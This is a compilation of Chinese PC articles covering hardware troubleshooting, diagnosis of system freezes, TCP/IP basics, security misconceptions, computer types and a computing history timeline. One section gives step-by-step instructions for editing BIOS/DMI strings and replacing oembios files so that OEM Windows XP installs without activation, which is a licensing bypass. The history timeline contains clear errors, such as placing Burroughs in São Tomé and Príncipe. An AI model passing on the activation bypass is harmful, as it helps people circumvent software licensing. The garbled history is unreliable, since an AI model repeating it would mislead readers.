2、 直接观察法： 即“看、听、闻、摸”.“看”即观察系统板卡的插头、插座是否歪斜电阻、电容引脚是否相碰，表面是否烧焦，芯片表面是否开裂,主板上的铜箔是否烧断。还要查看是否有无异物掉进主板的元器件之间（造成短路）,也可以看看板上是否有烧焦变色的地方,印刷电路板上的走线（铜箔）是否断裂等等。“听”即监听电源风扇、软/硬盘电机或寻道机构、显示器变压器等设备的工作声音是否正常。另外,系统发生短路故障时常常伴随着异常声响。监听可以及时发现一些事故隐患和帮助在事故发生时即时采取措施。 “闻”即辨闻主机、板卡中是否有烧焦的气味，便于发现故障和确定短路所在地。 “摸”即用手按压管座的活动芯片，看芯片是否松动或接触不良。另外，在系统运行时用手触摸或靠近CPU、显示器、硬盘等设备的外壳根据其温度可以判断设备运行是否正常；用手触摸一些芯片的表面，如果发烫,则为该芯片损坏。
3、 拔插法： PC机系统产生故障的原因很多,主板自身故障、I/O总线故障、各种插卡故障均可导致系统运行不正常。采用拔插维修法是确定故障在主板或I/O设备的简捷方法该方法就是关机将插件板逐块拔出,每拔出一块板就开机观察机器运行状态，一旦拔出某块后主板运行正常，那么故障原因就是该插件板故障或相应I/O总线插槽及负载电路故障。若拔出所有插件板后系统启动仍不正常，则故障很可能就在主板上。 拔插法的另一含义是：一些芯片、板卡与插槽接触不良,将这些芯片、板卡拔出后在重新正确插入可以解决因安装接触不当引起的微机部件故障。
3、 交换法： 将同型号插件板,总线方式一致、功能相同的插件板或同型号芯片相互交换根据故障现象的变化情况判断故障所在。此法多用于易拔插的维修环境,例如内存自检出错，可交换相同的内存芯片或内存条来判断故障部位,无故障芯片之间进行交换故障现象依旧，若交换后故障现象变化,则说明交换的芯片中有一块是坏的可进一步通过逐块交换而确定部位。如果能找到相同型号的微机部件或外设,使用交换法可以快速判定是否是元件本身的质量问题。 交换法也可以用于以下情况：没有相同型号的微机部件或外设，但有相同类型的微机主机,则可以把微机部件或外设插接到该同型号的主机上判断其是否正常
4、 比较法: 运行两台或多台相同或相类似的微机，根据正常微机与故障微机在执行相同操作时的不同表现可以初步判断故障产生的部位。
5、 振动敲击法: 用手指轻轻敲击机箱外壳,有可能解决因接触不良或虚焊造成的故障问题。然后可进一步检查故障点的位置排除之。
6、 升温降温法: 人为升高微机运行环境的温度，可以检验微机各部件（尤其是CPU）的耐高温情况，因而及早发现事故隐患。 人为降低微机运行环境的温度，如果微机的故障出现率大为减少，说明故障出在高温或不能耐高温的部件中,此举可以帮助缩小故障诊断范围。 事实上，升温降温法是采用的是故障促发原理，以制造故障出现的条件来促使故障频繁出现以观察和判断故障所在的位置。
7、 程序测试法: 随着各种集成电路的广泛应用，焊接工艺越来越复杂,同时，随机硬件技术资料较缺乏,仅靠硬件维修手段往往很难找出故障所在。而通过随机诊断程序专用维修诊断卡及根据各种技术参数(如接口地址），自编专用诊断程序来辅助硬件维修则可达到事半功倍之效。程序测试法的原理就是用软件发送数据、命令,通过读线路状态及某个芯片(如寄存器）状态来识别故障部位。此法往往是用于检查各种接口电路故障及具有地址参数的各种电路.但此法应用的前提是CPU及总线基本运行正常能够运行有关诊断软件,能够运行安装于I/O总线插槽上的诊断卡等。编写的诊断程序要严格、全面、有针对性，能够让某些关键部位出现有规律的信号,能够对偶发故障进行反复测试及能显示记录出错情况.软件诊断法要求具备熟练编程技巧、熟悉各种诊断程序与诊断工具(如debug、DM等)、掌握各种地址参数(如各种I/O地址)以及电路组成原理等,尤其掌握各种接口单元正常状态的各种诊断参考值是有效运用软件诊断法的前提基础
死机现象的故障一般检查处理方法:
在微机故障现象中，死机是一种较常见的故障现象,同时也是难于找到原因的故障现象之一。由于在“死机”状态下无法用软件或工具对系统进行诊断，因而增加了故障排除的难度。 死机现象一般表现为:系统不能启动、显示黑屏、显示“凝固”、键盘不能输入、软件运行非正常中断等。 死机可以由软件和硬件两方面的原因引起,本文主要分析由硬件引起的死机故障以及检查处理方法。 掌握下面的方法,可以加快对死机故障原因的确认，收到事半功倍的效果。
1、 排除系统“假”死机现象
首先排除因电源问题带来的“假”死机现象。应检查微机电源是否插好,电源插座是否接触良好,主机、显示器以及打印机、扫描仪、外置式MODEM、音箱等要外接电源的设备电源插头是否可靠地插入了电源插座,上述各部件的电源开关是否都置于了开(ON)的位置。
检查微机各部件间数据、控制连线是否连接正确和可靠,插头间是否有松动的现象尤其是主机与显示器的数据线连接不良常常造成“黑屏”的假死机现象。
2、 排除病毒和杀毒因素引起的死机现象： 用无毒干净的系统盘引导系统，然后再运行一下KV300、KILL、AV95、SCAN等防病毒软件的最新版本对硬盘进行检查，确保微机安全，排除因病毒引起的死机现象。 另外，如果在杀毒后引起了死机现象，这多半是因为病毒破坏了系统文件、应用程序及关键的数据文件;或是杀毒软件在消除病毒的同时对正常的文件进行了误操作,破坏了正常文件的结构。碰到这类问题，只能将被损坏(即运行时引起死机)的系统或软件进行重装。
3、 不同时候死机的处理方法：如果是在系统启动期间发生的死机，请转到第6步；如果是在系统启动后，软件运行期间发生的死机，请转到第5步；如果是“黑屏”类的死机请转到第11步；其它死机请继续下一步。
4、 越来越频繁的死机现象的故障判断 如果死机现象是从无到有，并且越来越频繁，一般有以下两个原因： 使用维护不当，请参见第7步；微机部件品质不良或性能不稳定，请参见第10步。
5、 排除软件安装、配置问题引起的死机现象
如果软件安装过程中死机,则可能是系统某些配置与安装的软件冲突。配置包括系统BIOS设置、CONFIG.SYS和AUTOEXEC.BAT的设置、WINDOWS.INI、SYSTEM.INI的设置以及一些硬件驱动程序和内存驻留程序。可以试着修改上述设置项。对BIOS可以取其默认的设置,如“LOAD SETUP DEFAULT”和“LOAD BIOS DEFAULT”；对于CONFIG.SYS和AUTOEXEC.BAT,则可以在启动时按F5跳过系统配置文件或按F8逐步选择执行及逐项修改 CONFIG.SYS 和 AUTOEXEC.BAT 中的配置尤其是EMM386中关于EMS、XMS的配置情况来判断与安装程序什么地方发生了冲突；一些硬件驱动程序和内存驻留程序则可以通过不装载它们的方法来避免冲突。
如果是在软件安装后发生了死机,则是安装好的程序与系统发生冲突。一般的做法是恢复系统在安装前的各项配置,然后分析安装程序新装入部分使用的资源和可能发生的冲突，逐步排除故障原因；删除新安装程序也是解决冲突的方法之一。
如果是因为病毒或杀毒引起的软件运行死机，请参见第2步。
6、 系统启动过程中的死机现象 系统启动过程中的死机现象又有两种情况：
致命性死机，即系统自检过程未完成就死机，一般系统不给出提示
非致命性死机，在自检过程中或自检完成后死机,但系统给出声音、文字等提示信息。对于第一种情况，可以根据开机自检时致命性错误列表的情况,再结合其它方法对故障原因做进一步的分析,如：硬件安装情况(请参见第8步），系统配置(请参见第9步)，硬件设备品质(请参见第10步)以及显示器黑屏(请参见第11步)等。对于第二种情况，可以根据开机自检时非致命性错误代码表,开机自检时非致命性错误代码表和开机自检时鸣笛音响对应的错误代码表;开机自检时鸣笛音响对应的错误代码表中所列的情况对可能出现故障的部件做重点检查,但也不能忽略相关部件的检查，因为相当多的故障并不是由提示信息指出的部件直接引起,而常常是由相关部件故障引发一些关键系统部件（如：CPU、内存条、CACHE、电源、系统后备电池、主板、总线等)的故障也常常以各种相关或不相关部件故障的形式表现出来，因此这些部件的检查也应在考虑范围之内。
7、 排除因使用、维护不当引起的死机现象 微机在使用一段时间后会因为使用、维护不当而引起死机,尤其是长时间不使用微机后常会出现此类故障。引起的原因有以下几种：
积尘导致系统死机： 灰尘是微机的大敌。过多的灰尘附着在CPU、芯片、风扇的表面会导致这些元件散热不良；电路印刷板上的灰尘在潮湿的环境中常常导致短路,上述两种情况均会导致死机。 可以用毛刷将灰尘扫去，或用棉签沾无水酒精清洗积尘元件。注意不要将毛刷和棉签的毛、棉留在电路板和元件上而成为新的死机故障源
部件受潮： 长时间不使用微机，会导致部分元件受潮而使用不正常。可用电吹风的低热挡均匀对受潮元件“烘干”。注意不可对元件一部分加热太久或温度太高,避免烤坏元件。
板卡、芯片引脚氧化导致接触不良： 将板卡、芯片拔出，用橡皮擦轻轻擦拭引脚表面去除氧化物，重新插入插座。
板卡、外设接口松动导致死机： 仔细检查各I/O插槽插接是否正确，各外设接口接触是否良好，线缆连接是否正常。
意外损坏： 如：雷击电流通过未经保护的电源及MODEM电话线进入主机，损坏电源、主机板、MODEM及各种内外设备。意外损坏是否发生、其对微机产生了什么破坏性的后果，都只能用交换法、拔插法测试主机各部件的好坏来判断。
8、 排除因系统配置不当引起的死机现象 系统配置与微机硬件设备和系统BIOS、主板上跳线开关设置密切相关，常见的死机故障原因有：
CPU主频设置不当： 这些故障主要有CPU主频跳线开关设置错误、Remark CPU引起的BIOS设置与实际情况不符、超频使用CPU，CPU性能不良引起的死机。
内存条参数设置不当： 这一类的故障主要有内存条设置错误和Remark 内存条引起的BIOS设置与实际情况不符。
CACHE参数设置不当： 这一类的故障主要有CACHE设置错误、Remark CACHE引起的BIOS设置与实际情况不符。
CMOS参数被破坏： 由于频繁修改CMOS参数， 或病毒对CMOS参数的破坏，常常导致CMOS参数混乱而很难恢复。可以采用对CMOS放电的方法并采用系统BIOS默认设置值重新设定CMOS参数。CMOS的放电方法可参照主板说明书进行。重设CMOS参数后，还必须对硬盘杀毒。
9、 排除因硬件安装不当引起的死机现象 硬件外设安装过程中的疏忽常常导致莫名其妙的死机， 而且这一现象往往在微机使用一段时间后才逐步显露出来，因而具有一定的迷惑性。
部件安装不到位、插接松动、 连线不正确引起的死机： 显示卡与I/O插槽接触不良常常引起显示方面的死机故障，如“黑屏”；内存条、CACHE与插槽插接松动则常常引起程序运行中死机，甚至系统不能启动； 其它板卡与插槽(插座)的接触问题也常常引起各种死机现象。 要排除这些故障，只需将相应板卡、芯片用手摁紧，或从插槽(插座)上拔下从新安装。如果有空闲插槽 也可将该部件换一个插槽 安装以解决接触问题。 另外连先不正确有时也会引发死机故障。
安装不当导致部件变形、损坏引起的死机：口径不正确、长度不恰当的螺钉常常导致部件安装孔损坏、螺钉接触到部件内部电路引起短路导致了死机；不规格的主板、零部件或不规范的安装步骤常常引起机箱、主板、板卡外形上的变异因而挤压该部件内部元件导致局部短路、内部元件损坏导致莫名其妙的死机。如果只是微机部件外观变形 ,可以通过正确的安装方法和更换符合规格的零部件来解决；如果已经导致内部元件损坏，则只能更换新的零部件了。


1、什么是TCP/IP

《一键清理系统垃圾》

1、什么是TCP/IP

   TCP/IP是Transmission Control Protocol/Internet Protocol（传输控制协议/网际互联协议）的缩写。它是1978年～1979年由美国国防部高级研究计划局开发的用于异构网络的通信协议，协议包含了远程登录（Telnet）、文件传送（FTP）、电子邮件（SMTP）等，适用于各种不同的计算机系统的互联。TCP/IP是目前十分流行的一种网络协议，它可提供任意互连的网络间的通信，几乎所用的网络操作系统都支持TCP/IP协议。它是目前广泛使用的Internet的基础，虽然它不是国际标准，但事实上已成为计算机网络的工业标准。

2、TCP/IP应用两例
   TCP/IP应用一：远程登录（Telnet）
   UNIX是一个多用户系统。多用户系统都有用户帐号概念。用户帐号规定了用户对系统的使用权，用户登录进入后就可以访问系统的全部或部分资源。远程登录就是指一个远地用户通过TCP/IP进入帐号，访问远地资源。TELNET协议的目的是提供一个通用、双向、基于8位字符的通信服务。它是面向终端的处理。是一种网络上的虚终端。（NVT）
   远程登录的目的在于访问远地系统的资源。一个用户在登录后系统并不区分是否是本地用户。所以用户在本地可以作的任何操作都可在远地进行。
   如用户需要进行编译等操作是就需要TELNET到服务器上进行。微机上的TELNET程序很多。一般WINDOWS下的比较好(常见的有NETTERM、TERATERM、EASN等)，大多支持中文。DOS下的支持中文的TELNET较少。TELNET到主机后使用主机操作系统命令。（一般是UNIX命令）

   TCP/IP应用二：文件传输（FTP）
   FTP是用于TCP/IP网络的文件传输应用。是TCP/IP中使用最广泛的应用之一。FTP是基于客户/服务器模型设计的，客户和服务器之间利用TCP建立连接。FTP服务器在这里是指提供FTP服务的机器。任何一个UNIX系统都提供FTP Server服务。
   客户端的FTP程序可以按操作方式可以分成两种：命令方式和图形方式。一般DOS下的多是命令方式，WIN下的多是图形方式。无论是何种方式使用FTP都要经过连接的建立，文件传输连接解除三个步骤。连接的建立是指建立FTP会话连接，在这一过程中要求用户输入FTP服务器的地址，用户名和口令。连接建立后就可以在服务器和本地机（本地机可以是任意一台有FTP程序的支持TCP/IP的机器）之间传输文件了。现在的FTP程序还支持创建目录、删除目录、及删除文件等简单的文件操作。FTP允许客户指定存储数据的类型，常见的文件类型有文本和二进制两种。象TXT文件，HTML文件等都是文本文件，而可执行程序大多是二进制文件，图形文件也是二进制文件。在进行文件传输是一定要注意不要把二进制文件当成文本文件传输。DOS下的FTP一般为交互式，连接建立的命令是open,传输命令是get/put，连接结束命令是close。其他命令有目录移动命令cd，本地目录移动命令lcd.文件类型指定命令binary/ascll.另外还有一些辅助命令。
   WINDOWS下的FTP一般功能较强，可以支持带目录的文件上载和下载。（上载只象FTP服务器传输，下载反之）常用的WINDOWS下的FTP程序有WS_FTP32,WS_FTP16,CUTEFTP32,CF1614F5,FTP4W12Gd等。基于WINDOWS的FTP程序一般都有较好的集成性。文件的拷贝通过双点(double click)的方式实现。
   需要单独提一下的是NCFTP，这是一种可以连续拷贝的FTP程序，这种FTP在需要从国外站点或很热的站点取所需要的文件是非常有用。由于线路问题断线是常有的事，为了传输一个大文件用NCFTP可以较好的解决这一问题，因为它可以连续传输，即可以接着上次的断点传送。


几种OEM XP的BIOS及DMI修改法

《一键清理系统垃圾》

几种OEM XP的BIOS及DMI修改法

    通过修改主板BIOS，来安装联想XP操作系统，具体修改方式和修改字节，网友们已经了解，但对于其它品牌机随带的XP安装系统，如何修改，请看：

    1.联想： HOME/PRO通用

    通过BIOS修改: 在BIOS任意地方加入"LEGEND Dragon"字符串，一般加入到BIOS Message哪里就可以了。注意大小写。

    通过DMI修改: 也是在任意地方加入"LEGEND Dragon"字符串，不过不要动一些关键的值，比如CPU类型什么的，在那种地方改会让你得不偿失的。

    2.清华同方: HOME/PRO通用

    通过BIOS修改：在BIOS任意地方加入"THTF"字符串，加入到BIOS Message就可以了，和上面的联想是可以共存的。

    通过DMI修改: 也是一样，加入"THTF"字符串到任意位置。

    3.HP: HOME/PRO通用 不过PRO在某些KT333以前的VIA芯片组主板上不能用，是它本身的问题，提示“硬盘不能大于512GB”。

    只能通过DMI修改，在System项里面把Manufacturer Name改成"Hewlett-Packard",在Base Board项里，同样把Manufacturer Name改成"Hewlett-Packard"。注意哦，执行HP恢复盘的标准恢复是要清空整个硬盘的，只想安装系统的请用Advanced模式来做。

    4.其他一些问题

    修改BIOS用相应的BIOS工具，AMI用AMIBCP修改，Award用MODBIN或MODBIN6来修改。最好在纯DOS下进行，否则可能出现保存不了的情况，MODBIN6不要用2.0beta版，会弄坏你的BIOS文件的。

修改DMI用DMICFG来修改，也必须在DOS下运行，比修改BIOS安全一些。推荐修改DMI，而不修改BIOS。

    接下来就是HP PRO的问题了，这个恢复盘在检测硬盘的时候有一个小BUG，会和某些VIA主板有冲突，现象就是显示“硬盘不能大于512GB”，经过测试KT333没有这个问题，而比较老的KT133系列不论任何品牌都有这个问题。建议使用VIA主板的朋友不要使用HP PRO，除非你用KT333，其他芯片组的主板没有问题。

如何挑选各个厂商的OEM呢？我的建议是不用挑选！因为各个厂商的OEM差别很小，只在BIOS检测部分有差异，毕竟都是出自M$之手，安装任何厂商的都一样。不必再浪费时间下载了，手里有什么就装什么吧。

    破解其他厂商的OEM的方法：安装前只要用上面几个厂商安装盘里的oembios.*这4个文件替换你想要安装的OEM光盘的i386下的相应文件就可以了。如果安装前没有替换，安装后提示激活，那么就用解压缩后的oembios.dat oembios.bin oembios.sig oembios.cat替换system32下面的相应文件就可以了。然后按照上面已知厂商的方法修改BIOS/DMI就行了，这样就省去了重新下载的麻烦。


计算机安全认识的七大误区

《一键清理系统垃圾》

计算机安全认识的七大误区

   误区一：电脑安全问题就是如何查杀电脑病毒。去年的“尼姆达”、“红色代码”，今年的“求职信”等病毒的发作给全球计算机系统造成巨大损失，令人们谈“毒”色变。但电脑病毒远非PC安全课题的全部，它更包括了软件漏洞、非法操作、文件误删除、系统物理故障等多方面的问题。现有的杀毒软件还不足以从根本上解决这些计算机安全的问题。
   误区二：病毒制造者是造成计算机安全问题的主要原因。病毒制造、传播者固然令人痛恨，然而造成病毒危害愈演愈烈的根本原因就是软件自身的各种漏洞不断被破坏和利用。去年给全球带来超过30亿美元损失的“红色代码”病毒，就是利用了微软ISS网络服务器软件的一个漏洞大肆进行攻击和破坏。我国著名的信息安全专家、中国工程院院士沈昌祥指出，软件漏洞是一切信息安全问题的根源。即使没有病毒的攻击，它也可能给计算机的应用带来巨大的隐患和危险。
   误区三：对待电脑病毒的关键是“杀”。对于电脑病毒，很多人都有一种深恶痛绝的感觉，恨不能把它们通通杀光。但实际上这种方式并不足取，因为杀毒软件很有可能良莠不分，把本来合法的软件也当作病毒一刀“喀嚓”了，这就很容易造成数据的丢失和损毁。因此，对待电脑病毒应当是以“防”为主。
   误区四：文件被删除后就不可恢复。不少人以为被删除的文件从“回收站”彻底清空后就永远消失，从而放弃了因误删除数据和文件后重新恢复的努力。事实上，一些全新技术，如全息技术在信息安全领域的运用，使得恢复被删除、损坏的数据成为可能。
   误区五：杀毒软件的定位就是“电脑医生”。目前绝大多数的杀毒软件都在扮演“事后诸葛亮”的角色，即电脑被病毒感染后杀毒软件才忙不迭地去发现、分析、治疗。这种被动防御的消极模式远远不能彻底解决计算机安全的问题。安全软件应该是立足于拒病毒于PC门外的“健康专家”。
   误区六：在内部网上共享的文件是安全的。其实，你在共享文件的同时就会有软件漏洞呈现在互联网的不速之客面前，公众以及您的对手将可以自由地访问您的那些文件，并很有可能被有恶意的人利用和攻击。因此共享文件应该设置密码，一旦不需要共享时立即关闭。
   误区七：面对新病毒的纷纷涌现必须频繁升级你的杀毒软件。现在新病毒的出现可谓层出不穷，因此电脑上的安装的杀毒软件由过去每年升级一次变成每月升级几次，甚至可能是天天升级。这样的结果毫无疑问就是花更多的钱和精力去和病毒“赛跑”，也使自己的硬盘和系统资源被越来越多地占用。电脑用户已经厌倦了这种枯燥乏味的重复劳动以及对新病毒无边的恐惧。这种无休止的“道高一尺，魔高一丈”的升级大战，也意味着原有的杀毒软件技术理念已经走到了尽头。真正具有领先的反病毒技术的安全软件是无需频繁升级的，省钱、省力又省时。


计算机的分类

《一键清理系统垃圾》

计算机的分类

   计算机可分为模拟计算机和数字计算机两大类。
   模拟计算机的主要特点是：参与运算的数值由不间断的连续量表示，其运算过程是连续的，模拟计算机由于受元器件质量影响，其计算精度较低，应用范围较窄，目前已很少生产。
   数字计算机的主要特点是：参与运算的数值用断续的数字量表示，其运算过程按数字位进行计算，数字计算机由于具有逻辑判断等功能，是以近似人类大脑的"思维"方式进行工作，所以又被称为“电脑”。
   数字计算机按用途又可分为专用计算机和通用计算机。
   专用与通用计算机在其效率、速度、配置、结构复杂程度、造价和适应性等方面是有区别的。
   专用计算机针对某类问题能显示出最有效、最快速和最经济的特性，但它的适应性较差，不适于其它方面的应用。我们在导弹和火箭上使用的计算机很大部分就是专用计算机。这些东西就是再先进，你也不能用它来玩游戏。
   通用计算机适应性很强，应用面很广，但其运行效率、速度和经济性依据不同的应用对象会受到不同程度的影响。
   通用计算机按其规模、速度和功能等又可分为巨型机、大型机、中型机、小型机、微型机及单片机。这些类型之间的基本区别通常在于其体积大小、结构复杂程度、功率消耗、性能指标、数据存储容量、指令系统和设备、软件配置等的不同。
   一般来说，巨型计算机的运算速度很高，可达每秒执行几亿条指令，数据存储容量很大，规模大结构复杂，价格昂贵，主要用于大型科学计算。它也是衡量一国科学实力的重要标志之一。单片计算机则只由一片集成电路制成，其体积小，重量轻，结构十分简单，性能介于巨型机和单片机之间的就是大型机、中型机、小型机和微型机。它们的性能指标和结构规模则相应的依次递减。


计算机的基本组成

《一键清理系统垃圾》

计算机的基本组成

   计算机的主要组成部分可以归纳为以下五个部分：输入设备、存储器、运算器、控制器和输出设备。

输入设备
   输入设备是计算机的重要组成部分，输入设备与输出设备合称为外部设备，简称外设，输入设备的作用是将程序、原始数据、文字、字符、控制命令或现场采集的数据等信息输入到计算机。常见的输入设备有键盘、鼠标器、光电输入机、磁带机、磁盘机、光盘机等。

存储器
   存储器的功能是存储程序、数据和各种信号、命令等信息，并在需要时提供这些信息。

运算器
   运算器的功能是对数据进行各种算术运算和逻辑运算，即对数据进行加工处理。

控制器
   是整个计算机的中枢神经，其功能是对程序规定的控制信息进行解释，根据其要求进行控制，调度程序、数据、地址，协调计算机各部分工作及内存与外设的访问等。

输出设备
  输出设备与输入设备同样是计算机的重要组成部分，它把外算机的中间结果或最后结果、机内的各种数据符号及文字或各种控制信号等信息输出出来。微机常用的输出设备有显示终端CRT、打印机、激光印字机、绘图仪及磁带、光盘机等。


计算机发展史

《一键清理系统垃圾》

计算机发展史

一、机械计算机时代的拓荒者
   在西欧，由中世纪进入文艺复兴时期的社会大变革，大大促进了自然科学技术的发展，人们长期被神权压抑的创造力得到空前释放。其中制造一台能帮助人进行计算的机器，就是最耀眼的思想火花之一。从那时起，一个又一个科学家为把这一思想火花变成引导人类进入自由王国的火炬而不懈努力。但限于当时的科技总体水平，大都失败了，这就是拓荒者的共同命运：往往见不到丰硕的果实。后人在享用这甜美的时候，应该能从中品出一些汗水与泪水的滋味……
1614: 苏格兰人John Napier (1550-1617)发表了一篇论文，其中提到他发明了一种可以计算四则运算和方根运算的精巧装置。
1623: Wilhelm Schickard (1592-1635)制作了一个能进行六位以内数加减法，并能通过铃声输出答案的"计算钟"。通过转动齿轮来进行操作。
1625: William Oughtred (1575-1660) 发明计算尺
1642: 法国数学家Pascal 在WILLIAM Oughtred计算尺的基础上将计算尺加以改进，能进行八位计算。并且还卖出了许多，成为一种时髦的商品。
1668: 英国人Samuel Morl制作了一个非十进制的加法装置，适宜计算钱币。
1671: 德国数学家Gottfried Leibniz设计了一架可以进行乘法，最终答案可以最大达到16位。
1775: 英国Charles制作成功了一台与 Leibniz's 的计算机类似的机器。但更先进一些。
1776: 德国人Mathieus Hahn成功的制作了一台乘法器。
1801: Joseph-Maire Jacuard 开发了一台能用穿孔卡片控制的自动织布机。
1820: 法国人Charles Xavier Thomas de Colmar (1785-1870),制作成功第一台成品计算机，非常的可靠，可以放在桌面上，在后来的90多年间一直在市场上出售。
1822: 英国人Charles Babbage (1792-1871)设计了差分机和分析机，其中设计的理论非常的超前，类似于百年后的电子计算机，特别是利用卡片输入程序和数据的设计被后人所采用。
1832: Babbage 和Joseph Clement 制成了一个差分机的成品，开始可以进行6位数的运算。后来发展到20位、30位，尺寸将近一个房子那么大。结果以穿孔的形式输出。但限于当时的制造技术，他们的设计难以制成。
1834: 斯德哥尔摩的George Scheutz用木头做了一台差分机。
1834: Babbage 设想制造一台通用的分析机，在只读存储器（穿孔卡片）中存储程序和数据，Babbage在以后的时间继续他的研究工作，并于1840年将操作数提高到了40位，并基本实现了控制中心（CPU）和存储程序的设想，而且程序可以根据条件进行跳转，能在几秒内作出一般的加法，几分钟内作出乘除法。
1842: Babbage的差分机项目因为研制费用昂贵，被政府取消。但他自己仍花费大量的时间和精力于他的分析机研究。
1843: Scheutz 和他的儿子Edvard Scheutz 制造了一台差分机，瑞典政府同意继续支持他们的研究工作。
1847: Babbage 花两年时间设计了一台较简易的、31位的差分机，但没有人感兴趣并支持他造出这台机器。但后来伦敦科学博物馆用现代技术复制出这台机器后发现，它确实能准确的工作。
1848: 英国数学家George Boole创立二进制代数学。提前差不多一个世纪为现代二进制计算机铺平了道路。
1853: 令Babbage感到高兴的是，Scheutzes制造成功了真正意义上的比例差分机，能进行15位数的运算。象Babbage所设想的那样输出结果。后来伦敦的Brian Donkin又造出了更可靠的第二台。
1858: 第一台制表机被Albany的Dudley天文台买走。第二台被英国政府买走。但天文台并没有将其充分利用，后来被送进了博物馆。而第二台却被幸运的使用了很长时间。
1871: Babbage 制造了分析机的部分部件和印表机。
1878: 纽约的西班牙人Ramon Verea，制造成功桌面计算器。比前面提到的都要快。但他对将其推向市场不感兴趣，只是想表明，西班牙人可以比美国人做的更好。
1879: 一个调查委员会开始研究分析机是否可行，最后他们的结论是：分析机根本不可能工作。此时Babbage已经去世了。调查之后，人们将他的分析机彻底遗忘了。但Howard Aiken例外。
1885: 这时期更多的计算机涌现出来。如美国、俄国、瑞典等。他们开始用有槽的圆柱代替易出故障的齿轮。
1886: 芝加哥的Dorr E. Felt (1862-1930), 制造了第一台用按键操作的计算器，而且速度非常快，按键抬起，结果也就出来了。
1889: Felt推出桌面印表计算器。
1890: 1890美国人口普查。1880年的普查人工用了7年的时间进行统计。这意味着1890年的统计将会超过10年。美国人口普查部门希望能得到一台机器帮助提高普查的效率。Herman Hollerith，建立制表机公司的那个人，后来他的公司发展成了IBM公司。借鉴了Babbage的发明，用穿孔卡片存储数据，并设计了机器。结果仅仅用了6个周就得出了准确的数据（62622250人）。Herman Hollerith大发其财。
1892: 圣多美和普林西比的William S. Burroughs (1857-1898),制作成功了一台比Felt的功能更强的机器，真正开创了办公自动化工业。
1896: Herman Hollerith创办了IBM公司的前身。
1900～1910
1906: Henry Babbage, Charles Babbage 的儿子，在R. W. Munro的支持下，完成了父亲设计的分析机，但也仅能证明它能工作，而没有将其作为产品推出。

二、电子计算机最初的日子里
   在这之前的计算机，都是基于机械运行方式，尽管有个别产品开始引入一些电学内容，却都是从属与机械的，还没有进入计算机的灵活：逻辑运算领域。而在这之后，随着电子技术的飞速发展，计算机就开始了由机械向电子时代的过渡，电子越来越成为计算机的主体，机械越来越成为从属，二者的地位发生了变化，计算机也开始了质的转变。下面就是这一过渡时期的主要事件：
   1906: 美国的Lee De Forest发明了电子管。在这之前造出数字电子计算机是不可能的。这为电子计算机的发展奠定了基础。
1920～1930
1924年2月:IBM，一个具有划时代意义的公司成立。
1930～1940
1935: IBM推出IBM 601机。这是一台能在一秒钟算出乘法的穿孔卡片计算机。这台机器无论在自然科学还是在商业意义上都具有重要的地位。大约造了1500台。
1937: 英国剑桥大学的Alan M. Turing (1912-1954)出版了他的论文，并提出了被后人称之为"图灵机"的数学模型。
1937: BELL试验室的George Stibitz展示了用继电器表示二进制的装置。尽管仅仅是个展示品，但却是第一台二进制电子计算机。
1938: Claude E. Shannon 发表了用继电器进行逻辑表示的论文。
1938: 柏林的Konrad Zuse 和他的助手们完成了一个机械可编程二进制形式的计算机，其理论基础是Boolean代数。后来命名为Z1。它的功能比较强大，用类似电影胶片的东西作为存储介质。可以运算七位指数和16位小数。可以用一个键盘输入数字，用灯泡显示结果。
1939年1月1日: 加利福尼亚的David Hewlet和William Packard 在他们的车库里造出了Hewlett-Packard计算机。名字是两人用投硬币的方式决定的。包括两人名字的一部分。
1939年11月: 美国John V. Atanasoff和他的学生Clifford Berry 完成了一台16位的加法器，这是第一台真空管计算机。
1939: 二次世界大战的开始，军事需要大大促进了计算机技术的发展。
1939: Zuse和Schreyer开始在他们的Z1计算机的基础上发展Z2计算机。并用继电器改进它的存储和计算单元。但这个项目因为Zuse服兵役被中断了一年。
1939/1940: Schreyer利用真空管完成了一个10位的加法器，并使用了氖灯做存储装置。
1940～1950
1940年1月: Bell实验室的Samuel Williams和Stibitz制造成功了一个能进行复杂运算的计算机。大量使用了继电器，并借鉴了一些电话技术，采用了先进的编码技术。
1941夏季: Atanasoff和学生Berry完成了能解线性代数方程的计算机，取名叫"ABC"（Atanasoff-Berry Computer），用电容作存储器，用穿孔卡片作辅助存储器，那些孔实际上是"烧"上的。时钟频率是60HZ，完成一次加法运算用时一秒。
1941年12月: 德国Zuse制作完成了Z3计算机的研制。这是第一台可编程的电子计算机。可处理7位指数、14位小数。使用了大量的真空管。每秒钟能作3到4次加法运算。一次乘法需要3到5秒。
1943: 1943年到1959年时期的计算机通常被称作第一代计算机。使用真空管，所有的程序都是用机器码编写，使用穿孔卡片。典型的机器就是：UNIVAC。
1943年1月: Mark I，自动顺序控制计算机在美国研制成功。整个机器有51英尺长，重5吨，75万个零部件，使用了3304个继电器，60个开关作为机械只读存储器。程序存储在纸带上，数据可以来自纸带或卡片阅读器。被用来为美国海军计算弹道火力表。
1943年4月: Max Newman、Wynn-Williams和他们的研究小组研制成功"Heath Robinson"，这是一台密码破译机，严格说不是一台计算机。但是其使用了一些逻辑部件和真空管，其光学装置每秒钟能读入2000个字符。同样具有划时代的意义。
1943年9月 : Williams和Stibitz完成了"Relay Interpolator"，后来命名为"Model II Relay Calculator"。这是一台可编程计算机。同样使用纸带输入程序和数据。其运行更可靠，每个数用7个继电器表示，可进行浮点运算。
1943年12月: 最早的可编程计算机在英国推出，包括2400个真空管，目的是为了破译德国的密码，每秒能翻译大约5000个字符，但使用完后不久就遭到了毁坏。据说是因为在翻译俄语的时候出现了错误。
1946: ENIAC (Electronic Numerical Integrator 和 Computer): 第一台真正意义上的数字电子计算机。开始研制于1943年，完成于1946年。负责人是John W. Mauchly和J. Presper Eckert。重30吨，18000个电子管，功率25千瓦。主要用于计算弹道和氢弹的研制。

三、晶体管计算机的发展
   真空管时代的计算机尽管已经步入了现代计算机的范畴，但其体积之大、能耗之高、故障之多、价格之贵大大制约了它的普及应用。直到晶体管被发明出来，电子计算机才找到了腾飞的起点，一发而不可收……
1947: Bell实验室的William B. Shockley、 John Bardeen和Walter H. Brattain.发明了晶体管，开辟了电子时代新纪元。
1949: EDSAC：剑桥大学的Wilkes和他的小组建成了一台存储程序的计算机。输入输出设备仍是纸带。
1949: EDVAC (electronic discrete variable computer)：第一台使用磁带的计算机。这是一个突破，可以多次在其上存储程序。这台机器是John von Neumann提议建造的。
1949: "未来的计算机不会超过1.5吨。"这是当时科学杂志的大胆预测。
1950～1960
1950: 软磁盘由东京帝国大学的Yoshiro Nakamats发明。其销售权由IBM公司获得。开创存储时代新纪元。
